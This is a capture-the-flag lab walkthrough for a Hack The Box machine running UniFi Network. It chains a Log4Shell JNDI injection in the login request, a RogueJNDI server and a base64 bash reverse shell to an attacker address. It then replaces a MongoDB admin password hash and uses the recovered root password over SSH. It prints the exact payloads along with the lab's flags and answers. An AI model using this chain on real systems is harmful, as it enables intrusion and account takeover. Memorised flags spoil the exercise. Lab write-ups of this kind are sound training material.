в”Њв”Ђв”Ђ(kaliг‰їkali)-[~/htb]
в””в”Ђ$ nmap -sV 10.129.*.* -p-
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 13:53 +0100
Nmap scan report for 10.129.*.*
Host is up (0.071s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http            Apache Tomcat (language: en)
8443/tcp open  ssl/nagios-nsca Nagios NSCA
8843/tcp open  ssl/http        Apache Tomcat (language: en)
8880/tcp open  http            Apache Tomcat (language: en)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 183.15 seconds

Task 1:
22,6789,8080,8444

Task 2:
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~/htb]
в””в”Ђ$ nmap -p 8443 --script http-title 10.129.*.*
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 14:00 +0100
Nmap scan report for 10.129.*.*
Host is up (0.051s latency).

PORT     STATE SERVICE
8443/tcp open  https-alt
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage

Nmap done: 1 IP address (1 host up) scanned in 2.14 seconds

Task 3:
Lets see the webpage in the browser:
https://10.129.*.*:8443
And there is the version number...

Task 4:
Its a google search...CVE-2021-44228...

Task 5:
Lightweight Directory Access Protocol

Task 6:
tcpdump

Task 7:
389

Task 8:
To figure out, we need to get into the server.
Getting a shell (this will be tricky...)
First open Burpsuit, and open the login page, and try to login with anything...
In the HTTP history there will be a POST /api/login request, send it to repeater...

There is a part in the request:
{"username":"admin","password":"hadmin","remember":false,"strict":true}

As in the source what i found (https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi), we have to play with the "remember" part...
First we have to set up a listener:
sudo tcpdump -i tun0 port 389
Then in burpsuit's repeater:
change the remember line with this:

{"username":"admin","password":"hadmin","remember":"${jndi:ldap://10.10.*.*:1389/test}","strict":true}
It will respons with an error, but in the listener:
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ sudo tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:50:37.537996 IP 10.129.*.*.49214 > 10.10.*.*.ldap: Flags [S], seq 2093473764, win 64240, options [mss 1346,sackOK,TS val 3225491161 ecr 0,nop,wscale 7], length 0
14:50:37.538038 IP 10.10.*.*.ldap > 10.129.*.*.49214: Flags [R.], seq 0, ack 2093473765, win 0, length 0

It means it's vulnerable to log4shell!

For the next move we need 2 programs, java and maven, and if you don't have any one of them installed, then:
sudo apt update
sudo apt install openjdk-11-jdk
sudo apt-get install maven
Next is to get RogueJNDI which is a malicious LDAP server for JNDI attacks...:
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi 
mvn package
After it finished you will see something like this:
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  23.789 s
[INFO] Finished at: 2026-03-11T14:53:38+01:00
[INFO] ------------------------------------------------------------------------
                                                                                                                                                                         
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~/htb/rogue-jndi]
в””в”Ђ$ ls -la
total 44
drwxrwxr-x 5 kali kali 4096 Mar 11 14:53 .
drwxrwxr-x 3 kali kali 4096 Mar 11 14:52 ..
-rw-rw-r-- 1 kali kali 1706 Mar 11 14:53 dependency-reduced-pom.xml
drwxrwxr-x 7 kali kali 4096 Mar 11 14:53 .git
-rwxrwxr-x 1 kali kali  120 Mar 11 14:53 .gitignore
-rw-rw-r-- 1 kali kali 1073 Mar 11 14:53 LICENSE
-rw-rw-r-- 1 kali kali 3243 Mar 11 14:53 pom.xml
-rwxrwxr-x 1 kali kali 5234 Mar 11 14:53 README.md
drwxrwxr-x 4 kali kali 4096 Mar 11 14:53 src
drwxrwxr-x 6 kali kali 4096 Mar 11 14:53 target

Move into the 'target' directory, and there will be a file called RogueJndi-1.1.jar.
We will use this...
But before we use it we need this command:
echo "bash -i >& /dev/tcp/MYIP/4444 0>&1" | base64
You will get something like this: YmFzaCAtaSA+JiAvZGV2L3RjcC9BX1RFX1ZQTl9JUF9Dw41NRUQvNDQ0NCAwPiYxCg==
Now we can use the jar file:
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~/htb/rogue-jndi/target]
в””в”Ђ$ java -jar RogueJndi-1.1.jar --command "bash -c {echo,REPLACE_HERE_WHAT_YOU_GET_AS_BASE64}|{base64,-d}|{bash,-i}" --hostname 10.10.*.* 
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.*.*:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://10.10.*.*:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.*.*:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Mapping ldap://10.10.*.*:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.*.*:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.*.*:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://10.10.*.*:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.*.*:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload

So. As in the last line we can see, that o=tomcat can interact with the payload. Back into burpsuit's repeater, and change the remember line like this:
"remember":"${jndi:ldap://10.10.*.*:1389/o=tomcat}", ///BUT before we sending it, we have to setup another listener (to get the reverse shell):

в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ nc -lvp 4444
listening on [any] 4444 ...

Now send re request and check the listener:

в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ nc -lvp 4444
listening on [any] 4444 ...
10.129.*.*: inverse host lookup failed: Unknown host
connect to [10.10.*.*] from (UNKNOWN) [10.129.*.*] 35268
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
unifi@unified:/usr/lib/unifi$ 

We got the shell, what we wanted...
Find our first flag (user flag), and the task 8's answer:

unifi@unified:/usr/lib/unifi$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
unifi@unified:/usr/lib/unifi$ cd /home
cd /home
unifi@unified:/home$ ls
ls
michael
unifi@unified:/home$ cd michael
cd michael
unifi@unified:/home/michael$ ls
ls
user.txt
unifi@unified:/home/michael$ cat user.txt
cat user.txt
6ced1a6a89e666c0620cdb10262ba127
unifi@unified:/home/michael$ ps aux | grep mongo
ps aux | grep mongo
unifi         68  0.2  4.1 1100672 84800 ?       Sl   12:52   0:11 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1
unifi       2092  0.0  0.0  11468  1140 pts/0    S+   14:05   0:00 grep mongo
unifi@unified:/home/michael$ 

There is the port for MongoDB: 27117

Task 9:
Google to mongodb default databases...and i found that it usually uses 'ace', which is the right answer...

Task 10:
db.admin.find() -->with google search

Task 11:
db.admin.update() -->with google search

Root pw:

We need this command:

unifi@unified:/home/michael$ mongo --port 27117 ace --eval 'db.admin.find().forEach(printjson);'

In the first few lines:
"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
        "name" : "administrator",
        "email" : "administrator@unified.htb",
        "x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",

This is a SHA-512 code (the $6$ indicates this), with a Ry6Vdbse salt value...so this means cracking this is impossible.
We have to replace it somehow, and we can do it with db.admin.update()!

The right command is:
mongo --port 27117 ace --eval 'db.admin.update({"name":"administrator"},{$set:{"x_shadow":"$6$QFPnl83ujak/12ic$hhTYDwaaH3x3N6z.xHT6QuwegFQrzICngq0rUY/33/VWuHl.W/O7eadvFaWA8guaLI.i13BI4NKQSpC8h3Giu1" }})'

This will change the value of the password to the hash value of "Password1234" 

///with this command you can create anything:
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ mkpasswd -m sha-512 Password1234

$6$QFPnl83ujak/12ic$hhTYDwaaH3x3N6z.xHT6QuwegFQrzICngq0rUY/33/VWuHl.W/O7eadvFaWA8guaLI.i13BI4NKQSpC8h3Giu1
///

Now...Since we know the username and the password, we can log in in the browser...
There is a GUI for the UFINetwork, and in the settings/site menu there is a Device Authentication part...there you can find the root pw:
NotACrackablePassword4U2022

User flag:

We've found it earlier...:
6ced1a6a89e666c0620cdb10262ba127

Root flag:
This one is pretty easy, because we have a username: root and a password: NotACrackablePassword4U2022 and an open ssh port...
в”Њв”Ђв”Ђ(kaliг‰їkali)-[~]
в””в”Ђ$ ssh root@10.129.*.*       
The authenticity of host '10.129.*.* (10.129.*.*)' can't be established.
ED25519 key fingerprint is: SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '10.129.*.*' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
root@10.129.*.*'s password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

root@unified:~# cat /root/root.txt
e50bc93c75b634e4b272d2f771c33681
root@unified:~# 



